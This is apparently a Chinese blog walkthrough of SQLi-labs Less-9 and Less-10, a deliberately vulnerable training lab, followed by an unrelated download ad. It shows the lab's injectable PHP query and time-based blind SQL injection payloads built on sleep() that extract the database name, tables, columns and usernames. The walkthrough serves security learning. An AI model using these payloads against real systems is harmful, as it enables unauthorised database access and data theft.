SQLi-labs(Less-9、Less-10)

Less-9

GET - Blind - Time based. - Single Quotes
  • 输入测试符号,无错误响应返回,初步判定为盲注。
  • 查看源代码:
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
  	echo "<br>";
    echo "</font>";
  	}
	else 
	{
	echo '<font size="5" color="#FFFF00">';
	echo 'You are in...........';
	//print_r(mysql_error());
	//echo "You have an error in your SQL syntax";
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	}
  • 闭合方式为单引号,但正确输入错误输入的返回信息都是You are in.....

PS:正确输入错误输入的返回信息虽然都是You are in.....。但响应包头Content-length的长度不一样,正确输入时:
在这里插入图片描述
错误输入时:
在这里插入图片描述

  • 通常,在页面没有任何回显和错误信息提示的时候,可采用时间盲注这种手法。测试下面3条语句:
http://192.168.83.129:30080/Less-9/?id=1' and sleep(5)-- #
  • 常用的判断语句:
' and if(1,sleep(5),1) %23
' and if(1=0,1,sleep(5)) --+
" and if(1=0,1, sleep(5)) --+
) and if(1=0,1, sleep(5)) --+
') and if(1=0,1, sleep(5)) --+
") and if(1=0,1, sleep(5)) --+
...........
  • 时间盲注“公式”:if(【payload】,1,sleep(5))。即:如果查询语句为真,那么直接返回结果;如果我们的查询语句为假,那么过5秒之后返回页面。所以可根据返回页面的时间长短来判断查询语句是否执行正确。
  • if(expr1,expr2,expr3) :判断语句 如果expr1语句正确就执行,就紧接着执行expr2语句,执行expr3语句。
//猜库名的字符长度:
?id=1' and if (length(database())=x ,sleep(5),1)--+
//猜库名:
?id=1' and if(left(database(),1)='s' ,sleep(5),1)-- #  
//猜表名:
?id=1' and If(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1))=114,1,sleep(5))--+
//猜列名:
?id=1' and If(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))=105,1,sleep(5))--+
//猜数据:
?id=1' and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))--+

Less-10

GET - Blind - Time based - double quotes
  • 类似于Less-9,只不过闭合方式是双引号(")。
Python网络爬虫与推荐算法新闻推荐平台:网络爬虫:通过Python实现新浪新闻的爬取,可爬取新闻页面上的标题、文本、图片、视频链接(保留排版) 推荐算法:权重衰减+标签推荐+区域推荐+热点推荐.zip项目工程资源经过严格测试可直接运行成功且功能正常的情况才上传,可轻松复刻,拿到资料包后可轻松复现出一样的项目,本人系统开发经验充足(全领域),有任何使用问题欢迎随时与我联系,我会及时为您解惑,提供帮助。 【资源内容】:包含完整源码+工程文件+说明(如有)等。答辩评审平均分达到96分,放心下载使用!可轻松复现,设计报告也可借鉴此项目,该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的。 【提供帮助】:有任何使用问题欢迎随时与我联系,我会及时解答解惑,提供帮助 【附带帮助】:若还需要相关开发工具、学习资料等,我会提供帮助,提供资料,鼓励学习进步 【项目价值】:可用在相关项目设计中,皆可应用在项目、毕业设计、课程设计、期末/期中/大作业、工程实训、大创等学科竞赛比赛、初期项目立项、学习/练手等方面,可借鉴此优质项目实现复刻,设计报告也可借鉴此项目,也可基于此项目来扩展开发出更多功能 下载后请首先打开README文件(如有),项目工程可直接复现复刻,如果基础还行,也可在此程序基础上进行修改,以实现其它功能。供开源学习/技术交流/学习参考,勿用于商业用途。质量优质,放心下载使用。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值